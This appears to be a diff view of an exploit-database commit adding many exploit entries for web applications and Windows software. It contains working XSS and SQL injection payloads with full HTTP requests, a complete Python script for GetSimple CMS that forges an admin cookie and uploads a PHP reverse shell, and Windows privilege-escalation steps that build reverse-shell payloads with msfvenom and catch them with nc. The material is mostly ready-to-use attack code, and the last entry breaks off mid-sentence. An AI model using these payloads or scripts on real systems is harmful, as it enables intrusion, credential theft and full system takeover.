# Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)
# Date: 15 May 2023
# Exploit Author: Astik Rawat (ahrixia)
# Vendor Homepage: https://qloapps.com/
# Software Link: https://github.com/webkul/hotelcommerce
# Version: 1.5.2
# Tested on: Kali Linux 2022.4
# CVE : CVE-2023-30256
Description:
A Cross Site Scripting (XSS) vulnerability exists in Webkul Qloapps which is a free and open-source hotel reservation & online booking system written in PHP and distributed under OSL-3.0 Licence.
Steps to exploit:
1) Go to Signin page on the system.
2) There are two parameters which can be exploited via XSS
- back
- email_create
2.1) Insert your payload in the "back"- GET and POST Request
Proof of concept (Poc):
The following payload will allow you to execute XSS -
Payload (Plain text):
xss onfocus=alert(1) autofocus= xss
Payload (URL Encoded):
xss%20onfocus%3dalert(1)%20autofocus%3d%20xss
Full GET Request (back):
[http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]
2.2) Insert your payload in the "email_create" - POST Request Only
Proof of concept (Poc):
The following payload will allow you to execute XSS -
Payload (Plain text):
xss><img src=a onerror=alert(document.cookie)>xss
Payload (URL Encoded):
xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss
POST Request (email_create) (POST REQUEST DATA ONLY):
[controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]

28
exploits/php/webapps/51468.txt Normal file
View file

@ -0,0 +1,28 @@
[#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection
[#] Exploit Date: May 16, 2023.
[#] CVSS 3.1: 6.4 (Medium)
[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
[#] Tactic: Initial Access (TA0001)
[#] Technique: Exploit Public-Facing Application (T1190)
[#] Application Name: Affiliate Me
[#] Application Version: 5.0.1
[#] Vendor: https://www.powerstonegh.com/
[#] Author: h4ck3r - Faisal Albuloushi
[#] Contact: SQL@hotmail.co.uk
[#] Blog: https://www.0wl.tech
[#] Exploit:
[path]/admin.php?show=reply&id=[Injected Query]
[#] 3xample:
[path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -
[#] Notes:
- A normal admin can exploit this vulnerability to escalate his privileges to super admin.

45
exploits/php/webapps/51471.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title: LeadPro CRM v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/leadifly-lead-call-center-crm/43485578
# Demo Site: https://demo.leadifly.in
# Tested on: Kali Linux
# CVE: N/A
### Request ###
GET /api/v1/products?fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name%20lk%20%22%25aa%25%22&order=id%20desc&offset=0&limit=10
HTTP/1.1
Host: localhost
Cookie:
XSRF-TOKEN=eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0%3D;
leadifly_session=eyJpdiI6InYyUzVNWkVhVHVrODI2ZTl0a21SNmc9PSIsInZhbHVlIjoiSzNjeDVxYUJRbHZEOVd3Z2I3N2pWa1VrbHdTUUNNSmF6blFEN2E4Q3l5RjJ5WnUxbTdyaFJJN3dCUWhZRklzd3B2OWN5bkZJTnR0RndndGxyNjdRSUp6b2NBV1JhSHFWb211SllzajFkb3JCQmtqSzJEeU9ENDZDWW1jdnF0VHEiLCJtYWMiOiI1YjI1YTdlNjhkMDg4NTQyOGI0ODI0ODI5ZjliNzE0OWExNGUxMWVjYmY2MjM2Y2YyMmNkNjMzYmMzODYwNzE1IiwidGFnIjoiIn0%3D
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Csrf-Token: kMwvghrsJyPwJ1LGTXnMgMQAtQGA33DzzMYdes6V
Authorization: Bearer
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8ubGVhZGlmbHkuaW4vYXBpL3YxL2F1dGgvbG9naW4iLCJpYXQiOjE2ODQzMTk3ODAsImV4cCI6MTY4NDM0MTY4MCwibmJmIjoxNjg0MzE5NzgwLCJqdGkiOiJleGJDV2ZmdWhiWTIzRlNqIiwic3ViIjoiMSIsInBydiI6IjIzYmQ1Yzg5NDlmNjAwYWRiMzllNzAxYzQwMDg3MmRiN2E1OTc2ZjcifQ.0GcDjE6Q3GYg8PUeJQAXtMET6yAjGh1Bj9joRMoqZo8
X-Xsrf-Token:
eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0=
Referer: https://localhost/admin/product
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
### Parameter & Payloads ###
Parameter: filters (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name
lk "%aa%") AND (SELECT 6593 FROM (SELECT(SLEEP(5)))qBNH) AND
(8549=8549&order=id desc&offset=0&limit=10

43
exploits/php/webapps/51472.txt Normal file
View file

@ -0,0 +1,43 @@
# Exploit Title: Smart School v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor:
https://codecanyon.net/item/smart-school-school-management-system/19426018
# Demo Site: https://demo.smart-school.in
# Tested on: Kali Linux
# CVE: N/A
### Request ###
POST /course/filterRecords/ HTTP/1.1
Host: localhost
Cookie: ci_session=dd1bqn8ulsiog4vf7fle5hd4k4fklvve
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://localhost
Referer: https://localhost/course/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
searchdata%5B0%5D%5Btitle%5D=category&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id&searchdata%5B0%5D%5Bsearchvalue%5D=1
### Parameter & Payloads ###
Parameter: searchdata[0][searchfield] (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
searchdata[0][title]=category&searchdata[0][searchfield]=online_courses.category_id
AND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)--
hAHp&searchdata[0][searchvalue]=1

34
exploits/php/webapps/51473.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: Stackposts Social Marketing Tool v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor:
https://codecanyon.net/item/stackposts-social-marketing-tool/21747459
# Demo Site: https://demo.stackposts.com
# Tested on: Kali Linux
# CVE: N/A
### Request ###
POST /spmo/auth/login HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://localhost/spmo/
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Content-Length: 104
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1*
### Parameter & Payloads ###
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1')
AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg

36
exploits/php/webapps/51474.txt Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: Quicklancer v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor:
https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135
# Demo Site: https://quicklancer.bylancer.com
# Tested on: Kali Linux
# CVE: N/A
### Request ###
POST /php/user-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://localhost
Cookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2;
quickjob_view_counted=31; Quick_lang=arabic
Content-Length: 93
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
action=searchStateCountry&dataString=deneme
### Parameter & Payloads ###
Parameter: dataString (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068
FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo

140
exploits/php/webapps/51475.py Executable file
View file

@ -0,0 +1,140 @@
# Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE)
# Data: 18/5/2023
# Exploit Author : Youssef Muhammad
# Vendor: Get-simple
# Software Link:
# Version app: 3.3.16
# Tested on: linux
# CVE: CVE-2022-41544
import sys
import hashlib
import re
import requests
from xml.etree import ElementTree
from threading import Thread
import telnetlib
purple = "\033[0;35m"
reset = "\033[0m"
yellow = "\033[93m"
blue = "\033[34m"
red = "\033[0;31m"
def print_the_banner():
print(purple + '''
CCC V V EEEE 22 000 22 22 4 4 11 5555 4 4 4 4
C V V E 2 2 0 00 2 2 2 2 4 4 111 5 4 4 4 4
C V V EEE --- 2 0 0 0 2 2 --- 4444 11 555 4444 4444
C V V E 2 00 0 2 2 4 11 5 4 4
CCC V EEEE 2222 000 2222 2222 4 11l1 555 4 4
'''+ reset)
def get_version(target, path):
r = requests.get(f"http://{target}{path}admin/index.php")
match = re.search("jquery.getsimple.js\?v=(.*)\"", r.text)
if match:
version = match.group(1)
if version <= "3.3.16":
print( red + f"[+] the version {version} is vulnrable to CVE-2022-41544")
else:
print ("This is not vulnrable to this CVE")
return version
return None
def api_leak(target, path):
r = requests.get(f"http://{target}{path}data/other/authorization.xml")
if r.ok:
tree = ElementTree.fromstring(r.content)
apikey = tree[0].text
print(f"[+] apikey obtained {apikey}")
return apikey
return None
def set_cookies(username, version, apikey):
cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest()
cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest()
cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}"
headers = {
'Content-Type':'application/x-www-form-urlencoded',
'Cookie': cookies
}
return headers
def get_csrf_token(target, path, headers):
r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers)
m = re.search('nonce" type="hidden" value="(.*)"', r.text)
if m:
print("[+] csrf token obtained")
return m.group(1)
return None
def upload_shell(target, path, headers, nonce, shell_content):
upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true"
payload = {
'content': shell_content,
'edited_file': '../shell.php',
'nonce': nonce,
'submitsave': 1
}
try:
response = requests.post(upload_url, headers=headers, data=payload)
if response.status_code == 200:
print("[+] Shell uploaded successfully!")
else:
print("(-) Shell upload failed!")
except requests.exceptions.RequestException as e:
print("(-) An error occurred while uploading the shell:", e)
def shell_trigger(target, path):
url = f"http://{target}{path}/shell.php"
try:
response = requests.get(url)
if response.status_code == 200:
print("[+] Webshell trigged successfully!")
else:
print("(-) Failed to visit the page!")
except requests.exceptions.RequestException as e:
print("(-) An error occurred while visiting the page:", e)
def main():
if len(sys.argv) != 5:
print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>")
return
target = sys.argv[1]
path = sys.argv[2]
if not path.endswith('/'):
path += '/'
ip, port = sys.argv[3].split(':')
username = sys.argv[4]
shell_content = f"""<?php
$ip = '{ip}';
$port = {port};
$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
"""
version = get_version(target, path)
if not version:
print("(-) could not get version")
return
apikey = api_leak(target, path)
if not apikey:
print("(-) could not get apikey")
return
headers = set_cookies(username, version, apikey)
nonce = get_csrf_token(target, path, headers)
if not nonce:
print("(-) could not get nonce")
return
upload_shell(target, path, headers, nonce, shell_content)
shell_trigger(target, path)
if __name__ == '__main__':
print_the_banner()
main()

64
exploits/php/webapps/51476.txt Normal file
View file

@ -0,0 +1,64 @@
# Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-04-15
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.bludit.com/
# Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1
# Version: 3.14.1
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-31698
SVG Payload
-------------
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400
"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
save this SVG file xss.svg
Steps to Reproduce:
1. At first login your admin panel.
2. then go to settings and click the logo section.
3. Now upload xss.svg file so your request data will be
POST /bludit/admin/ajax/logo-upload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/112.0
Content-Type: multipart/form-data;
boundary=---------------------------15560729415644048492005010998
Referer: http://127.0.0.1/bludit/admin/settings
Cookie: BLUDITREMEMBERUSERNAME=admin;
BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985;
BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74i
Content-Length: 651
-----------------------------15560729415644048492005010998
Content-Disposition: form-data; name="tokenCSRF"
626c201693546f472cdfc11bed0938aab8c6e480
-----------------------------15560729415644048492005010998
Content-Disposition: form-data; name="inputFile"; filename="xss.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400
"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
-----------------------------15560729415644048492005010998--
4. Now open the logo image link that you upload. You will see XSS pop up.

17
exploits/php/webapps/51477.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)
# Date: 2023-04-17
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: http://churchcrm.io/
# Software Link: https://github.com/ChurchCRM/CRM/releases/tag/4.5.4
# Version: 4.5.4
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-31699
Steps to Reproduce:
1. At first login your admin panel.
2. Then click the "Admin" menu and click "CSV Import '' and you will get
the CSV file uploader option.
3. now insert xss payload in jpg file using exiftool or from image
properties and then upload the jpg file.
4. you will see XSS pop up.

27
exploits/php/webapps/51478.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)
# Date: 2023-02-02
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://civicrm.org
# Software Link: https://civicrm.org/download
# Version: 5.59.alpha1, 5.58.0 (and earlier), 5.57.3 (and earlier)
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 109.0.1, Microsoft Edge 109.0.1518.70)
# CVE: CVE-2023-25440
Vendor Security Advisory: CIVI-SA-2023-05
Description:
A stored cross-site scripting (XSS) vulnerability in CiviCRM 5.59.alpha1 allows attacker to execute arbitrary web
scripts or HTML.
Injecting persistent javascript code inside the "Add Contact" function while creating a contact, in first/second name
field, it will be triggered once page gets loaded.
Steps to reproduce:
- Quick Add contact to CiviCRM,
- Insert a payload PoC inside the field(s)
- Click on 'Add contact'.
If a user visits the dashboard, as well as "Recently added" box, the javascript code will be rendered.

55
exploits/ruby/webapps/51446.txt Normal file
View file

@ -0,0 +1,55 @@
# Exploit Title: Authenticated Persistent XSS in Cameleon CMS 2.7.4
# Google Dork: intext:"Camaleon CMS is a free and open-source tool and
a fexible content management system (CMS) based on Ruby on Rails"
# Date: 2023-10-05
# Exploit Author: Yasin Gergin
# Vendor Homepage: http://camaleon.tuzitio.com
# Software Link: https://github.com/owen2345/camaleon-cms
# Version: 2.7.4
# Tested on: Linux kali 6.1.0-kali7-amd64
# CVE : -
--- Description ---
http://127.0.0.1:3000/admin/login - Login as a Admin
Under Post tab click on "Create New"
While creating the post set Title as "><svg/onmouseover=alert(document.cookie)>
http://127.0.0.1:3000/admin/post_type/2/posts - Post data will be sent
to this url
-- POST DATA --
POST /admin/post_type/2/posts HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:3000/admin/post_type/2/posts/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 666
Origin: http://127.0.0.1:3000
Connection: keep-alive
Cookie:
_my_project_session=w4yj2Y%2FqHaXYDhwwBDnYsyQUc6AtLUnItJ3MGHBV1yS40xwTgjfvlBZVNgqKIvg1W58e0mxyW4OcBk0XwJRZ90j6SmCHG1KJG9ppBKk%2FdKGDboPCRBq40qKhHnkssRPCgRgIjs69EG7htSdUY%2Bbgit9XTESgvSusBBhsIED%2BLH0VBOBL6H%2FV4Mp59NEP7LhP%2FHmlulEa7I43J8HKpStDj2HiXxA5ZghvSkvpfQpN2d047jLhl71CUcW7pHxmJ4uAdY5ip5OTIhJG9TImps5TbIUrOHyE9vKp1LXzdmbNNi2GI5utUUsURLGUtaN7Fam3Kpi8IqEaBA%3D%3D--8ZKl2%2F6OzLCXn2qA--%2BtMhAwdbdfxNzoSPajkZrg%3D%3D;
auth_token=iRDUqXfbhmibLIM5mrHelQ&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A102.0%29+Gecko%2F20100101+Firefox%2F102.0&127.0.0.1;
phpMyAdmin=4f5ad7484490645a49d171c03e15dab2; pma_lang=en
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
authenticity_token=vuAzhnu6UocDR6zpeeaQxvlVjdmIMr9LPrLEcK5FGVAEYQamLHI1fAG7jBQ3FwEX_ACWedzoX72WAUxqj5wKrQ&post%5Bdraft_id%5D=&post%5Bslug%5D=svgonmouseoveralertdocumentcookie&meta%5Bslug%5D=svgonmouseoveralertdocumentcookie&post%5Btitle%5D=%22%3E%3Csvg%2Fonmouseover%3Dalert%28document.cookie%29%3E&post%5Bcontent%5D=%3Cp%3Eqwe%3C%2Fp%3E&meta%5Bsummary%5D=qwe&options%5Bseo_title%5D=&options%5Bkeywords%5D=&options%5Bseo_description%5D=&options%5Bseo_author%5D=&options%5Bseo_image%5D=&options%5Bseo_canonical%5D=&commit=Create&post%5Bstatus%5D=published&meta%5Btemplate%5D=&meta%5Bhas_comments%5D=0&meta%5Bhas_comments%5D=1&categories%5B%5D=6&tags=&meta%5Bthumb%5D=
-- POST DATA --
Then view the post you've created by clicking on "View Page" move your
mouse cursor onto post title. XSS will popup.

91
exploits/windows/local/51453.txt Normal file
View file

@ -0,0 +1,91 @@
# Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE
# Date: 2023/05/04
# Exploit Author: msd0pe
# Vendor Homepage: https://www.trendmicro.com
# My Github: https://github.com/msd0pe-1
Trend Micro OfficeScan Client:
Versions =< 10.0 contains wrong ACL rights on the OfficeScan client folder which allows attackers to escalate privileges to the system level through the services. This vulnerabily does not need any privileges access.
[1] Verify the folder rights:
> icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"
C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F)
NT SERVICE\TrustedInstaller:(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
BUILTIN\Administrators:(F)
BUILTIN\Administrators:(OI)(CI)(IO)(F)
BUILTIN\Users:(F)
BUILTIN\Users:(OI)(CI)(IO)(F)
CREATOR OWNER:(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)
[2] Get informations about the services:
> sc qc tmlisten
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: tmlisten
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OfficeScan NT Listener
DEPENDENCIES : Netman
: WinMgmt
SERVICE_START_NAME : LocalSystem
OR
> sc qc ntrtscan
SERVICE_NAME: ntrtscan
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OfficeScan NT RealTime Scan
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
[3] Generate a reverse shell:
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe
OR
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe
[4] Upload the reverse shell to C:\Program Files(x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files(x86)\Trend Micro\OfficeScan Client\ntrtscan.exe
[5] Start listener
> nc -lvp 4444
[6] Reboot the service/server
> sc stop tmlisten
> sc start tmlisten
OR
> sc stop ntrtscan
> sc start ntrtscan
OR
> shutdown /r
[7] Enjoy !
192.168.1.102: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system

48
exploits/windows/local/51461.txt Normal file
View file

@ -0,0 +1,48 @@
*#Exploit Title:* Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking
*#Date:* 14/05/2023
*#Exploit Author:* Ahsan Azad
*#Vendor Homepage:* https://hubstaff.com/
*#Software Link:* https://app.hubstaff.com/download
*#Version:* 1.6.13, 1.6.14
*#Tested On:* 64-bit operating system, x64-based processor
*Description*
Hubstaff is an employee work tracker with screenshots, timesheets, billing,
in-depth reports, and more.
During testing. It was found that the system32 subdirectory was missing a
DLL library with the name *wow64log.dll* that had been required by the
hubstaff's setup file during installation. Hence, using Metasploit's
msfvenom to create a new wow64log.dll file, Tester was able to get a
reverse shell locally.
*Exploit*
1- Generate a dll file with the name wow64log.dll using the command:
*msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f dll
-o wow64log.dll*
2- Place the newly generated DLL to the *system32 *directory.
3- Start a listener on attacker's console using:
*nc -lnvp <port_used_while_generating_DLL>*
4- Launch the exe.
Reverse shell will be receive as:
*C:\Windows>*
*Attachments (For the understanding of verification team)*
1.png - Showing the wow64.dll was not found by the exe. [image: 1.png]
2.png - Showing how tester was able to generate a new dll using msfvenom on
port 1337.
[image: 2.png]
3.png - Showing a reverse connection received on the attacker's console
at C:\Windows> by launching the exe.[image: 3.png]

53
exploits/windows/local/51479.txt Normal file
View file

@ -0,0 +1,53 @@
# Exploit Title :MobileTrans 4.0.11 - Weak Service Privilege Escalation
# Date: 20 May 2023
# Exploit Author: Thurein Soe
# Vendor Homepage: https://mobiletrans.wondershare.com/
# Software Link:
https://mega.nz/file/0Et0ybRS#l69LRlvwrwmqDfPGKl_HaJ5LmbeKJu_wH0xYKD8nSVg
# Version: MobileTrans version 4.0.11
# Tested on: Window 10 (Version 10.0.19045.2965)
# CVE : CVE-2023-31748
Vulnerability Description:
MobileTrans is World 1 mobile-to-mobile file transfer
application.MobileTrans version 4.0.11 was being suffered a weak service
permission vulnerability that allows a normal window user to elevate to
local admin. The "ElevationService" service name was installed, while the
MobileTrans version 4.0.11 was installed in the window operating system.
The service "ElevationService" allows the local user to elevate to the
local admin as The "ElevationService" run with system privileges.
Effectively, the local user is able to elevate to local admin upon
successfully modifying the service or replacing the affected executable.
C:\Users\HninKayThayar\Desktop>sc qc ElevationService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ElevationService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files
(x86)\Wondershare\MobileTrans\ElevationService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Driver Install Service help
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\HninKayThayar\Desktop>cacls "C:\Program Files
(x86)\Wondershare\MobileTrans\ElevationService.exe"
C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
Everyone:(ID)F
NT
AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

23
exploits/windows/webapps/51466.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
# Date: 16/05/2023
# Exploit Author: Sahil Ojha
# Vendor Homepage: https://www.escanav.com
# Software Link: https://cl.escanav.com/ewconsole.dll
# Version: 14.0.1400.2281
# Tested on: Windows
# CVE : CVE-2023-31702
*Step of Reproduction/Proof of concept(POC)*
1. Login into the escan management console with a valid username and
password as root user.
2. Navigate to URL:
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=4176
3. Inject the payload into the UsrId parameter to confirm the SQL
injection as shown below:
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR
DELAY '0:0:5'--&cnt=4176
4. The time delay of 5 seconds confirmed that "UsrId" parameter was
vulnerable to SQL Injection. Furthermore, it was also possible to dump
all the databases and inject OS shell directly into the MS SQL Server
using SQLMap tool.

19
exploits/windows/webapps/51467.txt Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: eScan Management Console 14.0.1400.2281 - Cross Site Scripting
# Date: 2023-05-16
# Exploit Author: Sahil Ojha
# Vendor Homepage: https://www.escanav.com
# Software Link: https://cl.escanav.com/ewconsole.dll
# Version: 14.0.1400.2281
# Tested on: Windows
# CVE : CVE-2023-31703
*Step of Reproduction/ Proof of Concept(POC)*
1. Login into the eScan Management Console with a valid user credential.
2. Navigate to URL:
https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P=
3. Now, Inject the Cross Site Scripting Payload in "from" parameter as
shown below and a valid XSS pop up appeared.
https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P=
4. By exploiting this vulnerability, any arbitrary attacker could have
